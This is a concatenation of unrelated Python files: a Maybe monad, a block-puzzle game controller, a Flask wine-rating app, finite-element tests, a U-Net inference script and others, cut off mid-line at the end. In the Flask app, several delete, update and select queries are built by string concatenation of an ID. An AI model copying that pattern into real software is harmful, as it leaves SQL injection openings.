maybe(self.val.__int__()) def __float__(self): return maybe(self.val.__float__()) def __index__(self): return maybe(self.val.__index__()) def __round__(self, ndigits=None): return maybe(self.val.__round__(ndigits)) def __trunc__(self): return maybe(self.val.__trunc__()) def __floor__(self): return maybe(self.val.__floor__()) def __ceil__(self): return maybe(self.val.__ceil__()) def __init__(self, val): self._val = val self._ = self.JustDelegator(val) @property def val(self): return self._val def map(self, func): return Just(func(self.val)) def flatmap(self, func): result = func(self.val) return result def unpack(self): return (self.val, True) def get(self, default=None): return self.val @property def is_nothing(self): return False def __eq__(self, other): return isinstance(other, Just) and self.val == other.val def __iter__(self): return iter((self.val,)) def __bool__(self): return True def __repr__(self): return u'Just({!r}'.format(self.val) def __str__(self): return u'Just {}'.format(self.val) class Nothing(Maybe): class NothingDelegator: def return_nothing(self, *args, **kwargs): return nothing def nop(self, *args, **kwargs): pass __getattr__ = return_nothing __getitem__ = return_nothing __missing__ = return_nothing __setitem__ = nop __delitem__ = nop __repr__ = return_nothing __str__ = return_nothing __bytes__ = return_nothing __format__ = return_nothing __lt__ = return_nothing __le__ = return_nothing __eq__ = return_nothing __ne__ = return_nothing __gt__ = return_nothing __ge__ = return_nothing __hash__ = return_nothing __bool__ = return_nothing __dir__ = return_nothing __call__ = return_nothing __len__ = return_nothing __length_hint__ = return_nothing __iter__ = return_nothing __reversed__ = 
return_nothing __contains__ = return_nothing __add__ = return_nothing __sub__ = return_nothing __mul__ = return_nothing __matmul__ = return_nothing __truediv__ = return_nothing __floordiv__ = return_nothing __mod__ = return_nothing __divmod__ = return_nothing __pow__ = return_nothing __lshift__ = return_nothing __rshift__ = return_nothing __and__ = return_nothing __xor__ = return_nothing __or__ = return_nothing __radd__ = return_nothing __rsub__ = return_nothing __rmul__ = return_nothing __rmatmul__ = return_nothing __rtruediv__ = return_nothing __rfloordiv__ = return_nothing __rmod__ = return_nothing __rdivmod__ = return_nothing __rpow__ = return_nothing __rlshift__ = return_nothing __rrshift__ = return_nothing __rand__ = return_nothing __rxor__ = return_nothing __ror__ = return_nothing __iadd__ = nop __isub__ = nop __imul__ = nop __imatmul__ = nop __itruediv__ = nop __ifloordiv__ = nop __imod__ = nop __ipow__ = nop __ilshift__ = nop __irshift__ = nop __iand__ = nop __ixor__ = nop __ior__ = nop __neg__ = return_nothing __pos__ = return_nothing __abs__ = return_nothing __invert__ = return_nothing __complex__ = return_nothing __int__ = return_nothing __float__ = return_nothing __index__ = return_nothing __round__ = return_nothing __trunc__ = return_nothing __floor__ = return_nothing __ceil__ = return_nothing _ = NothingDelegator() @property def val(self): raise NoValueError def map(self, func): return self def flatmap(self, func): return self def unpack(self): return (None, False) def get(self, default=None): return default @property def is_nothing(self): return True def __eq__(self, other): return isinstance(other, Nothing) def __iter__(self): return iter(()) def __bool__(self): return False def __repr__(self): return u'Nothing()' def __str__(self): return u'Nothing' nothing = Nothing() def maybe(val): return val if isinstance(val, Maybe) \ else Just(val) if val is not None else nothing def maybe_lazy(generator): return maybe(next(generator, None)) maybe.lazy = maybe_lazy from __future__ import annotations from typing import Optional import src.elements as elements import src.game.element_data as element_data from src.game.movement import Movement from src.game.physics import RigidBody from src.game.vector2D import Vector2D class Controller: """Controller base class for controlling the movement of level elements.""" def __init__(self): pass def _move( self, data: element_data.ElementData, direction: Vector2D, ) -> None: """Moves this level element laterally by some number of spaces given. The number of spaces can be positive or negative. """ RigidBody.move_active_element(data, direction) def move_up(self, data: element_data.ElementData) -> None: """Move this level element upward according to the rules.""" self._move(data, Movement.UP) def move_left(self, data: element_data.ElementData) -> None: """Move this level element leftward according to the rules. If there are any objects to the left of block dude, he cannot move left. """ self._move(data, Movement.LEFT) def move_right(self, data: element_data.ElementData) -> None: """Move this level element rightward according to the rules. If there are any objects to the left of block dude, he cannot move left. """ self._move(data, Movement.RIGHT) def move_down(self, data: element_data.ElementData) -> None: """Move this level element rightward according to the rules. If there are any objects to the left of block dude, he cannot move left. 
""" self._move(data, Movement.DOWN) def interact(self, data: element_data.ElementData) -> None: pass def get_head_of_active(data: element_data.ElementData) -> elements.LevelElement: """...""" head_position = data.active_element.position + Movement.UP return data.level.get_element_at_position(head_position) def get_lateral_of_active(data: element_data.ElementData) -> elements.LevelElement: """...""" lateral_position = data.active_element.position + data.active_element.facing return data.level.get_element_at_position(lateral_position) def get_top_lateral_of_active(data: element_data.ElementData) -> elements.LevelElement: """...""" top_lateral_position = get_lateral_of_active(data).position + Movement.UP return data.level.get_element_at_position(top_lateral_position) def is_block(element: elements.LevelElement) -> bool: """Whether the element is a block.""" return isinstance(element, elements.Block) def is_space(element: elements.LevelElement) -> bool: """Whether the element is a block.""" return isinstance(element, elements.Space) def is_clear_for_action(*elements: elements.LevelElement) -> bool: """Ensures the area around the character is clear for picking up blocks.""" return all((is_space(element) for element in elements)) class DoNothingController: """The do nothing controller. Useful for doing nothing on a level element.""" class DudeController(Controller): """Block Dude controller with its rules.""" def __init__(self): super().__init__() self.carrying: Optional[elements.ControllableLevelElement] = None def move( self, data: element_data.ElementData, direction: Vector2D, ) -> None: """Moves the selected element around the map""" # Move the carrying block as well top_lateral_element = get_top_lateral_of_active(data) # lateral_element = get_lateral_of_active(data) position = RigidBody.move_element(data, direction, data.active_element) if self.carrying and is_clear_for_action(top_lateral_element): # Check if we can move block_position = RigidBody.move_element(data, direction, self.carrying) if (block_position - position).x: self.carrying = None def move_left(self, data: element_data.ElementData) -> None: """Move this level element leftward according to the rules. If there are any objects to the left of block dude, he cannot move left. """ self.move(data, Movement.LEFT) def move_right(self, data: element_data.ElementData) -> None: """Move this level element rightward according to the rules. If there are any objects to the left of block dude, he cannot move left. 
""" self.move(data, Movement.RIGHT) def move_up(self, data: element_data.ElementData) -> None: """Move this level element upward according to the rules.""" active_element = data.active_element facing = active_element.facing lateral_element = get_lateral_of_active(data) head_element = get_head_of_active(data) if not is_clear_for_action(lateral_element): el = data.level.get_element_at_position(head_element.position + Movement.UP) if not self.carrying and is_clear_for_action(head_element, el): up_and_lateral_position = facing + Movement.UP self.move(data, up_and_lateral_position) elif self.carrying: up_and_lateral_position = facing + Movement.UP self.move(data, up_and_lateral_position) def box_action(self, data: element_data.ElementData) -> None: """The box action as picking up or dropping.""" lateral_element = get_lateral_of_active(data) top_lateral_element = get_top_lateral_of_active(data) head_element = get_head_of_active(data) if not self.carrying: if is_block(lateral_element) and is_clear_for_action( top_lateral_element, head_element, ): RigidBody.move_element_to_destination( data, head_element.position, lateral_element ) data.soundboard.play_sfx("pickup_square") self.carrying = lateral_element else: # top lateral position is empty space, drop it if is_clear_for_action(top_lateral_element): facing = data.active_element.facing RigidBody.move_element(data, facing, self.carrying) data.soundboard.play_sfx("thud") self.carrying = None def move_down(self, data: element_data.ElementData) -> None: """Move down action from command.""" self.box_action(data) def interact(self, data: element_data.ElementData) -> None: if self.carrying: return position = data.level.active_element.position below = position + Movement.DOWN bottom_element = data.level.get_element_at_position(below) if isinstance(bottom_element, elements.TelekinesisPad): block = data.level.find_element(elements.TelekinesisBlock) data.level.set_active_element(block) data.soundboard.play_sfx("tele_pickup") class TelekinesisController(Controller): def _move( self, data: element_data.ElementData, direction: Vector2D, ) -> None: """movement function without rigid body so that the cube can float""" position = data.level.active_element.position lateral_position = position + direction lateral_element = data.level.get_element_at_position(lateral_position) destination = lateral_position if isinstance(lateral_element, elements.Space): destination = lateral_position data.soundboard.play_sfx("step") else: destination = position data.soundboard.play_sfx("bump") data.level.move_element(position, destination) def interact(self, data: element_data.ElementData): """Gives the controls back to blockdude Also drops the block before so that it doesn't float """ data.soundboard.play_sfx("tele_drop") position = data.level.active_element.position below = position + Movement.DOWN while isinstance(data.level.get_element_at_position(below), elements.Space): below += Movement.DOWN data.level.move_element(position, below+Movement.UP) dude = data.level.find_element(elements.Dude) data.level.set_active_element(dude) # -*- coding: utf-8 -*- """ Spyder Editor This is a temporary script file. 
""" import random balance = 500000 balance_history = [] BUY = True SELL = False trades_pairs_to_make = 100 def get_bitcoin_price(): return random.randint(0,20000) def trade (side, price, current_balance): x = 5 if side: current_balance = current_balance - price else: current_balance = current_balance + price return current_balance for n in range(0,trades_pairs_to_make): price = get_bitcoin_price() balance = trade(BUY, price, balance) balance_history.append(balance) price = get_bitcoin_price() balance = trade(SELL, price, balance) balance_history.append(balance) print ('Trades made', trades_pairs_to_make *2) print(balance_history) grpc_framework/interceptors/log.py10-100 """ log interceptor """ import grpc from grpc_framework.decorators import log_deco class LoggerInterceptor(grpc.ServerInterceptor): @log_deco def intercept_service(self, continuation, handler_call_details): return continuation(handler_call_details) sbernasek/flyqmaflyqma/validation/growth.py import numpy as np from ..visualization import * class GrowthTrends: """ Class for extracting and plotting clone trends. """ def __init__(self, data): """ Instantiate object for plotting clone trend data. Args: data (pd.DataFrame) """ self.data = data.replace([np.inf, -np.inf], np.nan) self.x = 2**self.means.recombination_start self.ylabels = { 'num_clones': 'Number of clones', 'mean_clone_size': 'Mean clone size', 'percent_heterozygous': 'Recombination extent', 'transclone_edges': 'Trans-clone edges per cell', 'clone_size_variation': 'Clone size variation'} @property def num_replicates(self): """ Number of growth replicates. """ return self.data.replicate_id.max()+1 @property def means(self): """ Mean values aggregated over replicates. """ gb = self.data.groupby('column_id') return gb.mean() @property def stds(self): """ Std dev of values aggregated over replicates. """ gb = self.data.groupby('column_id') return gb.std() @default_figure def plot_trend(self, yvar, ax=None, **kwargs): """ Plot against recombination start generation. """ # get y data y = self.means[yvar] ystd = self.stds[yvar] y_SEM = ystd / np.sqrt(self.num_replicates) # plot trend ax.errorbar(self.x, y, yerr=y_SEM, **kwargs) # format axis ax.set_xlabel('Recombination start (no. cells)') ylabel = '' if yvar in self.ylabels.keys(): ylabel = self.ylabels[yvar] ax.set_ylabel(ylabel) ax.set_xscale('log', basex=2) ax.set_xticks([1,2,4,8,16,32,64,128,256,512]) ax.spines['right'].set_visible(False) ax.spines['top'].set_visible(False) #Written by: #Version 1.0 import enchant #------------------------------------------------------------------FUNCTIONS CREATED AND DEFINED HERE------------------------------------------------------------------ #A recursive search algorithm that finds words of a given length in a 2d table of letters #by treating the letters as nodes with edges to all the letters in the table immediately surrounding #the given letter. 
#results is a set of strings containing words that are found #word_table is a list of strings that compose the letters and their positions given by wordbubbles #word_length is the target length of a word #curr_length is the length of the current recursive branch #visited is a set of tuples representing visited already visited letters in the current branch #prev_string is a string keeping track of the previously visited letters and their order of the current branch #curr_coord is a tuple of the coordinate in word_table of the letter currently being visited #dict is a spell checker that is used to see if generated strings are english words def find_words(results, word_table, word_length, curr_len, visited, prev_string, curr_coord, dictionary): #end branches that lead to empty spaces ('-' metacharacter) if word_table[curr_coord[0]][curr_coord[1]] == '-': return #update the string prev_string = prev_string+word_table[curr_coord[0]][curr_coord[1]] #base case, end the recursive branch when you've reached a word of the target length if curr_len == word_length: if prev_string not in results and dictionary.check(prev_string.lower()): results.add(prev_string) return #If the branch doesn't terminate, update information and recurr #makes a copy of the visited set (since sets behave as pass by reference) and adds the current coordinate to visited update_visited = set([]) update_visited.add(curr_coord) update_visited = update_visited.union(visited) x_coord = curr_coord[0] y_coord = curr_coord[1] columns = len(word_table[0]) rows = len(word_table) #attempt to recurr at all surrounding spaces that are in bounds and that haven't been visted yet if x_coord-1 >= 0 and y_coord-1 >= 0: if (x_coord-1, y_coord-1) not in visited: find_words(results, word_table, word_length, curr_len+1, update_visited, prev_string, (x_coord-1, y_coord-1), dictionary) if x_coord-1 >= 0: if (x_coord-1, y_coord) not in visited: find_words(results, word_table, word_length, curr_len+1, update_visited, prev_string, (x_coord-1, y_coord), dictionary) if x_coord-1 >= 0 and y_coord+1 < columns: if (x_coord-1, y_coord+1) not in visited: find_words(results, word_table, word_length, curr_len+1, update_visited, prev_string, (x_coord-1, y_coord+1), dictionary) if y_coord+1 < columns: if (x_coord, y_coord+1) not in visited: find_words(results, word_table, word_length, curr_len+1, update_visited, prev_string, (x_coord, y_coord+1), dictionary) if x_coord+1 < rows and y_coord+1 < columns: if (x_coord+1, y_coord+1) not in visited: find_words(results, word_table, word_length, curr_len+1, update_visited, prev_string, (x_coord+1, y_coord+1), dictionary) if x_coord+1 < rows: if (x_coord+1, y_coord) not in visited: find_words(results, word_table, word_length, curr_len+1, update_visited, prev_string, (x_coord+1, y_coord), dictionary) if x_coord+1 < rows and y_coord-1 >= 0: if (x_coord+1, y_coord-1) not in visited: find_words(results, word_table, word_length, curr_len+1, update_visited, prev_string, (x_coord+1, y_coord-1), dictionary) if y_coord-1 >= 0: if (x_coord, y_coord-1) not in visited: find_words(results, word_table, word_length, curr_len+1, update_visited, prev_string, (x_coord, y_coord-1), dictionary) def get_input(word_length, word_table, rows): rows = unicode(raw_input("Please enter the number of rows of letters: "), 'utf-8') if rows.isnumeric(): if not float(rows).is_integer(): print "Number of rows must be an integer" exit() else: print "Number of rows must be an integer" exit() word_length = unicode(raw_input("Please enter the number of 
letters in the word: "), 'utf-8') if word_length.isnumeric(): if not float(word_length).is_integer(): print "Number of letters must be an integer" exit() else: print "Number of letters must be an integer" exit() print "\n\n\nYou will now be prompted to input strings of characters representing each row. If there is an empty space in a row, enter '-' in the string.\n For example, if the wordbubbles grid of letters looked like this:\nA B D F\nD A B S\nS N K\n you would enter 'ABDF' for row 1, 'DABS' for row 2, and 'SN-K' for row 3.\n\n\n" for num in range(int(rows)): word_table.append(raw_input("Please enter a string of characters representing row #"+str(num)+": ")) return (int(word_length), int(rows)) #---------------------------------------HANDLE INPUT------------------------------------------ if __name__ == '__main__': word_table = [] results = set([]) word_length = 0 rows = 0 dictionary = enchant.Dict("en_US") values = get_input(word_length, word_table, rows) word_length = values[0] rows = values[1] #----------------------------------FIND SOLUTIONS----------------------------------------- #Run the function to search for words of the target length at every location. for x_coord in range(rows): for y_coord in range(len(word_table[0])): curr_coord = (x_coord, y_coord) visited = set([]) find_words(results, word_table, word_length, 1, visited, "", curr_coord, dictionary) for item in results: print item ftlow.py #!/usr/bin/env python2 """ For The Love of Wine (FTLOW) ~~~~~~ A quick and dirty wine rating application based (heavily) off the Flaskr Flask example by and sqlite3 :copyright: (c) 2013 by . :license: BSD, see LICENSE for more details. """ from __future__ import with_statement import sqlite3 from flask import Flask, request, session, g, redirect, url_for, abort, \ render_template, flash, _app_ctx_stack, Response from flaskext.bcrypt import Bcrypt import os, sys import StringIO import flickr import urllib, urlparse # create our little application :) app = Flask(__name__) bcrypt = Bcrypt(app) app.config.from_pyfile('settings.py') """ Begin Database functions """ def init_db(): """Creates the database tables.""" with app.app_context(): db = get_db() with app.open_resource('schema.sql') as f: db.cursor().executescript(f.read()) db.commit() def get_db(): """Opens a new database connection if there is none yet for the current application context. 
""" top = _app_ctx_stack.top if not hasattr(top, 'sqlite_db'): sqlite_db = sqlite3.connect(app.config['DATABASE'], check_same_thread = False) sqlite_db.row_factory = sqlite3.Row top.sqlite_db = sqlite_db return top.sqlite_db @app.teardown_appcontext def close_db_connection(exception): """Closes the database again at the end of the request.""" top = _app_ctx_stack.top if hasattr(top, 'sqlite_db'): top.sqlite_db.close() def query_db(query, args=(), one=False): db = get_db() cur = db.execute(query, args) rv = [dict((cur.description[idx][0], value) for idx, value in enumerate(row)) for row in cur.fetchall()] return (rv[0] if rv else None) if one else rv """ functions dealing with users in DB """ def get_user(name): user = query_db('select * from users where username = ?', [name], one=True) if user is None: return None else: return user['username'] def get_username(user_id): username = query_db('select username from users where id = ?', [user_id], one=True) return username['username'] def match_password(name, password): password_hash = query_db('select password from users where username = ?', [name], one=True) return bcrypt.check_password_hash(password_hash['password'], password) """ Begin views """ @app.route('/index', endpoint='show_landing_page-alternative') @app.route('/') def show_landing_page(): return render_template('index.html') @app.route('/drink') def show_entries_drink(): if not session.get('logged_in'): error = "Please login or create an account" return render_template('login.html', error=error) else: user_id = session['user_id'] user_name = get_username(user_id) db = get_db() cur = db.execute('select id, winery, location, vintage, style, vineyard, drank from entries where drank=? and username=? order by winery asc', ('0', user_name)) entries = cur.fetchall() for entry in entries: get_photo_drink(entry[0]) #os.remove('static/' + str(entry[0]) + '.jpg') cur.close() return render_template('show_drink.html', entries=entries, user_name=user_name) @app.route('/static/.jpg') def get_photo_drink(entry_id): if not session.get('logged_in'): abort(401) else: db = get_db() cur = db.execute('select photo from entries where id=' + str(entry_id)) ablob = cur.fetchone() cur.close() return Response(ablob[0]) @app.route('/drank') def show_entries_drank(): db = get_db() cur = db.execute('select winery, location, vintage, style, vineyard, rating, thoughts, flavours, drank, id from entries where drank=? 
order by winery asc', '1') entries = cur.fetchall() cur.close() return render_template('show_drank.html', entries=entries) """ Begin adding entries """ @app.route('/drank/add', methods=['POST']) def add_entry_drank(): if not session.get('logged_in'): abort(401) else: user_id = session['user_id'] user_name = get_username(user_id) db = get_db() db.execute('insert into entries (winery, location, vintage, style, vineyard, rating, thoughts, flavours, drank, username) values (?, ?, ?, ?, ?, ?, ?, ?, 1, ?)', [request.form['winery'], request.form['location'], request.form['vintage'], request.form['style'], request.form['vineyard'], request.form['rating'], request.form['thoughts'], request.form['flavours'], user_name]) db.commit() flash('New entry was successfully posted') return redirect(url_for('show_entries_drank')) @app.route('/drink/add', methods=['POST']) def add_entry_drink(): if not session.get('logged_in'): abort(401) else: user_id = session['user_id'] user_name = get_username(user_id) tag = 'creativecommons' text = request.form['winery'] + ' ' + request.form['style'] print 'Searching for: ', text photos = flickr.photos_search(text=text, tags=tag) urllist = [] #store a list of what was downloaded path = '' if not photos: photo = open("static/default.jpg", "rb").read() photobin = sqlite3.Binary(photo) else: flash('Downloading image, please be patient') url = photos[0].getURL(size='Medium', urlType='source') urllist.append(url) path = os.path.basename(urlparse.urlparse(url).path) photo = urllib.URLopener().retrieve(url, path) print 'downloading: ', url file, mime = urllib.urlretrieve(url) photo = open(file, "rb").read() photobin = sqlite3.Binary(photo) db = get_db() db.execute('insert into entries (winery, location, vintage, style, vineyard, drank, username, photo) values (?, ?, ?, ?, ?, 0, ?, ?)', [request.form['winery'], request.form['location'], request.form['vintage'], request.form['style'], request.form['vineyard'], user_name, photobin]) db.commit() if (path): print 'removing photo at: ', path os.remove(path) flash('New entry was successfully posted') return redirect(url_for('show_entries_drink')) @app.route('/drank/remove/') def remove_entry_drank(entry_id): if not session.get('logged_in'): abort(401) else: user_id = session['user_id'] user_name = get_username(user_id) db = get_db() db.execute('delete from entries where id =' + str(entry_id)) db.commit() flash('Entry was successfully removed') return redirect(url_for('show_entries_drank')) @app.route('/drink/remove/') def remove_entry_drink(entry_id): if not session.get('logged_in'): abort(401) else: user_id = session['user_id'] user_name = get_username(user_id) db = get_db() db.execute('delete from entries where id =' + str(entry_id)) db.commit() flash('Entry was successfully removed') return redirect(url_for('show_entries_drink')) @app.route('/drank/move/') def move_entry_drank(entry_id): if not session.get('logged_in'): abort(401) else: user_id = session['user_id'] user_name = get_username(user_id) db = get_db() db.execute('update entries set drank=0 where id =' + str(entry_id)) db.commit() flash('Entry was successfully moved to Drink') return redirect(url_for('show_entries_drink')) @app.route('/drink/move/') def move_entry_drink(entry_id): if not session.get('logged_in'): abort(401) else: user_id = session['user_id'] user_name = get_username(user_id) db = get_db() db.execute('update entries set drank=1 where id =' + str(entry_id)) db.commit() flash('Entry was successfully moved to Drank') return 
redirect(url_for('show_entries_drank')) """ Begin login/logout/register """ @app.route('/login', methods=['GET', 'POST']) def login(): error = None if request.method == 'POST': if get_user(request.form['username']) is None: error = 'Please register' elif not match_password(request.form['username'], request.form['password']): error = 'Invalid password, try again' else: user = query_db('select id from users where username = ?', [request.form['username']], one=True) session['logged_in'] = True session['user_id'] = user['id'] flash('You were logged in') return redirect(url_for('show_entries_drank')) return render_template('login.html', error=error) @app.route('/logout') def logout(): session.pop('logged_in', None) flash('You were logged out') return redirect(url_for('show_entries_drank')) @app.route('/register', methods=['GET', 'POST']) def register(): error = None db = get_db() if request.method == 'POST' and not get_user(request.form['username']): pw_hash = bcrypt.generate_password_hash(request.form['password']) db.execute('insert into users (username, password) values (?, ?)', [request.form['username'], pw_hash]) db.commit() return redirect(url_for('login')) elif request.method == 'POST': error = "Username has already been taken" return render_template('login.html', error=error) return render_template('login.html') """ Begin custom error pages """ @app.errorhandler(401) def page_unauthorized(e): return render_template('401.html'), 401 @app.errorhandler(403) def page_forbidden(e): return render_template('403.html'), 403 @app.errorhandler(404) def page_not_found(e): return render_template('404.html'), 404 @app.errorhandler(500) def page_server_error(e): return render_template('500.html'), 500 """ main """ if __name__ == '__main__': try: with open('ftlow.db'): app.run(host='192.168.1.187') except IOError as e: init_db() app.run(host='192.168.1.187') # -*- coding: utf-8 -*- ''' Test for checking Neumann conditions. 
''' from unittest import TestCase import numpy as np import scipy as sp import pandas as pd from pandas.testing import assert_frame_equal from numpy.testing import assert_allclose, assert_almost_equal from amfe.element import Tri3Boundary, Tri6Boundary, Quad4Boundary, Quad8Boundary, LineLinearBoundary from amfe.element.boundary_element import BoundaryElement from amfe.neumann import * class DummyBoundary(BoundaryElement): def __init__(self): pass def f_mat(self, X, u): f_mat = np.array([[0, -1/3], [0, -1/3]]) return f_mat class NeumannTest(TestCase): def setUp(self): self.test_boundary = DummyBoundary() self.test_direct = np.array([1, -1]) self.time_func = lambda t: 2 def tearDown(self): pass def test_fixed_direction_neumann(self): X = None u = None t = 0.0 neumann = FixedDirectionNeumann(self.test_direct, self.time_func) neumann._boundary_element = self.test_boundary f_ext_actual = neumann.f_ext(X, u, t) desired_f = np.array([2/3, -2/3, 2/3, -2/3]) np.testing.assert_allclose(f_ext_actual, desired_f, rtol=1E-6, atol=1E-7) def test_normal_following_neumann(self): X = None u = None t = 0.0 neumann = NormalFollowingNeumann(self.time_func) neumann._boundary_element = self.test_boundary f_proj = neumann._f_proj(self.test_boundary.f_mat(X, u)) f_ext_actual = neumann.f_ext(X, u, t) desired_f = np.array([0, -2/3, 0, -2/3]) np.testing.assert_allclose(f_ext_actual, desired_f, rtol=1E-6, atol=1E-7) def test_projected_neumann(self): X = None u = None t = 0.0 neumann = ProjectedAreaNeumann(self.test_direct, self.time_func) neumann._boundary_element = self.test_boundary f_ext_actual = neumann.f_ext(X, u, t) desired_f = np.array([0.47140452, -0.47140452, 0.47140452, -0.47140452]) np.testing.assert_allclose(f_ext_actual, desired_f, rtol=1E-6, atol=1E-7) class TestNeumannManager(TestCase): def setUp(self): self.neumann_man = NeumannManager() self.test_boundary = DummyBoundary() self.test_direct = np.array([1, -1]) self.time_func = lambda t: 2 def test_create_neumann(self): neumann = self.neumann_man.create_fixed_direction_neumann(direction=self.test_direct) self.assertIsInstance(neumann, FixedDirectionNeumann) neumann = self.neumann_man.create_normal_following_neumann() self.assertIsInstance(neumann, NormalFollowingNeumann) neumann = self.neumann_man.create_projected_area_neumann(direction=self.test_direct) self.assertIsInstance(neumann, ProjectedAreaNeumann) def test_assign_neumann_by_eleids(self): eleids = [2, 7] ele_shapes = ['Tri3', 'Quad4'] time_func = lambda t: 3.0*t neumannbc = self.neumann_man.create_fixed_direction_neumann((1, 0), time_func) self.neumann_man.assign_neumann_by_eleids(neumannbc, eleids, ele_shapes, tag='_eleids', property_names=eleids, name='TestCondition') neumann_obj_df = self.neumann_man.el_df neumann_obj_array = neumann_obj_df[['neumann_obj', 'fk_mesh']].values self.assertIsInstance(neumann_obj_array[0, 0], FixedDirectionNeumann) self.assertIsInstance(neumann_obj_array[0, 0]._boundary_element, Tri3Boundary) self.assertEqual(neumann_obj_array[0, 1], 2) self.assertIsInstance(neumann_obj_array[1, 0], FixedDirectionNeumann) self.assertIsInstance(neumann_obj_array[1, 0]._boundary_element, Quad4Boundary) self.assertEqual(neumann_obj_array[1, 1], 7) self.assertEqual(neumann_obj_array.shape, (2, 2)) neumann_df_actual = self.neumann_man._neumann_df df_dict = {'name': {0: 'TestCondition'}, 'tag': {0: '_eleids'}, 'property_names': {0: np.array([2, 7], dtype=int)}, 'neumann_obj': neumannbc} neumann_df_desired = pd.DataFrame.from_dict(df_dict) assert_frame_equal(neumann_df_actual, 
neumann_df_desired, check_like=True) def test_get_ele_obj_fk_mesh_and_fk_mapping(self): eleids = [2, 7] ele_shapes = ['Tri3', 'Quad4'] time_func = lambda t: 3.0 * t neumannbc = self.neumann_man.create_fixed_direction_neumann((1, 0), time_func) self.neumann_man.assign_neumann_by_eleids(neumannbc, eleids, ele_shapes, tag='_eleids', property_names=eleids, name='TestCondition') fks = [100, 105] local_ids = self.neumann_man.el_df.index.get_values() for fk, local_id in zip(fks, local_ids): self.neumann_man.write_mapping_key(fk, local_id) ele_obj, fk_mesh, fk_mapping, = self.neumann_man.get_ele_obj_fk_mesh_and_fk_mapping() # test ele_obj self.assertIsInstance(ele_obj[0], FixedDirectionNeumann) self.assertIsInstance(ele_obj[0]._boundary_element, Tri3Boundary) self.assertIsInstance(ele_obj[1], FixedDirectionNeumann) self.assertIsInstance(ele_obj[1]._boundary_element, Quad4Boundary) # test fk_mesh self.assertEqual(fk_mesh[0], 2) self.assertEqual(fk_mesh[1], 7) # test fk_mapping self.assertEqual(fk_mapping[0], 100) self.assertEqual(fk_mapping[1], 105) def test_write_mapping(self): eleids = [2, 7] ele_shapes = ['Tri3', 'Quad4'] time_func = lambda t: 3.0 * t neumannbc = self.neumann_man.create_fixed_direction_neumann((1, 0), time_func) self.neumann_man.assign_neumann_by_eleids(neumannbc, eleids, ele_shapes, tag='_eleids', property_names=eleids, name='TestCondition') neumann_obj_df = self.neumann_man.el_df fk = 100 local_id = neumann_obj_df.index.get_values()[0] self.neumann_man.write_mapping_key(fk, local_id) actual = self.neumann_man.el_df.loc[local_id, 'fk_mapping'] self.assertEqual(actual, fk) """ Edge Module ============ Represents the edge in the undirected graph. Contains the two connected vertices u and w. Usage: * Not to be run as the main class. * Used as a link between vertices. Example: u = Vertex(x1, y1) v = Vertex(x2, y2) # Undirected, so Edge(v, u) == Edge(u, v) e = Edge(v, u) """ class Edge: """ Edge Class ---------- Represents the edge between two vertices Attributes: * u (Vertex): The vertex connected. * v (Vertex): The vertex connected. """ def __init__(self, u, v): """ Initialises the edge with two vertices * :param u (Vertex): Vertex U connected with this edge. * :param v (Vertex): Vertex V connected with this edge. """ self.u = u self.v = v def __eq__(self, other): """ Overrides the base equality so we can check that two edges are equal to each other. * :param other: The other object we are comparing :return: Bool if equal """ # If it's the same class, then it should have the same vertices. if isinstance(other, Edge): return (other.u == self.v or other.u == self.u) \ and (other.v == self.u or other.v == self.v) # If it's not the same class, it's not equal return False def __repr__(self): """ Defines the string representation of the edge. """ return "<{}-{}>".format(self.u, self.v) def __hash__(self): """ Makes the class hashable """ return hash(repr(self)) Tiago-S-Ribeiro/Python-Pro-Bootcamp100_days_of_code/Intermediate+/day_38/main.py from data import API_KEY, APP_ID, ENDPOINT, GENDER, WEIGHT, HEIGHT, AGE, WORKOUT_ENDPOINT, AUTH import requests import datetime as dt workout_headers = { "Authorization": AUTH } nutri_headers = { "x-app-id": APP_ID, "x-app-key": API_KEY, } current_date = dt.datetime.now() user_input = input("What exercises have you done today? 
") user_headers = { "query": user_input, "gender": GENDER, "weight_kg": WEIGHT, "height_cm": HEIGHT, "age": AGE } response = requests.post(url=ENDPOINT, json=user_headers, headers=nutri_headers) response_data = response.json() for workout in response_data["exercises"]: workout_data = { "workout": { "date": current_date.strftime('%d/%m/%Y'), "time": current_date.strftime('%H:%M:%S'), "exercise": workout["name"].title(), "duration": round(workout["duration_min"]), "calories" : round(workout["nf_calories"]) } } response_workout = requests.post(url=WORKOUT_ENDPOINT, json=workout_data, headers=workout_headers) print(response_workout.text)apps/agent/apps.py from django.apps import AppConfig class AgentConfig(AppConfig): name = 'agent' def ready(self): from agent import signals import os import numpy as np import matplotlib.pyplot as plt import cv2 import torch import torch.nn as nn import torchvision.models as models from model import Unet from utils.dataloader import read_data_path, MaskDataset from torch.utils.data import DataLoader from utils.config import Config from utils.loss import dice_score # Hyperparameter config = Config() TRAIN_TEST_SPLIT = config.TRAIN_TEST_SPLIT BATCH_SIZE_VALIDATION = config.BATCH_SIZE_VALIDATION BATCH_SIZE_TESTING = config.BATCH_SIZE_TESTING PRED_SAVE_DIR = config.PRED_SAVE_DIR os.makedirs(PRED_SAVE_DIR, exist_ok=True) INFERENCE_WEIGHT = config.INFERENCE_WEIGHT # Use torch cuda device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') # Import Resnet-50 as base network, modify first layer model_ft = models.resnet50(pretrained=True) model_ft.conv1 = nn.Conv2d(1, 64, kernel_size=(3, 3), stride=(2, 2), padding=(3, 3), bias=False) # Add Residual layer in unet model = Unet(model_ft) model.to(device) if INFERENCE_WEIGHT: model.load_state_dict(torch.load(INFERENCE_WEIGHT)) # Read data path, make in dataloader """ read_data_path input: (float), the split of train and test return: (list, list, list), train & valid & test file path list list -> (img_path, mask_path) """ training_list, validation_list, testing_list = read_data_path(TRAIN_TEST_SPLIT) val_dataset = MaskDataset(validation_list) val_loader = DataLoader(val_dataset, batch_size=BATCH_SIZE_VALIDATION, shuffle=False, drop_last=True) # Erosion and Dilation def ero_and_dil(image): kernel = np.ones((3,3), np.uint8) erosion = cv2.erode(image.copy(), kernel, iterations = 1) kernel = np.ones((7,7), np.uint8) dilation = cv2.dilate(erosion.copy(), kernel, iterations = 1) return dilation dice_score_list = [] number = 0 with torch.no_grad(): for imgs, masks in val_loader: imgs_gpu = imgs.to(device) outputs = model(imgs_gpu) outputs = torch.round(outputs) * 255 masks = masks.to(device) # Dice score list dice_scores = dice_score(outputs, masks) dice_score_list.extend([dice_scores.item()]) for index in range(BATCH_SIZE_VALIDATION): img_origin = np.reshape(imgs_gpu[index].cpu().numpy(), (256, 256)) pred_img = np.reshape(outputs[index].cpu().numpy(), (256, 256)) mask_img = np.reshape(masks[index].cpu().numpy()*255, (256, 256)) number 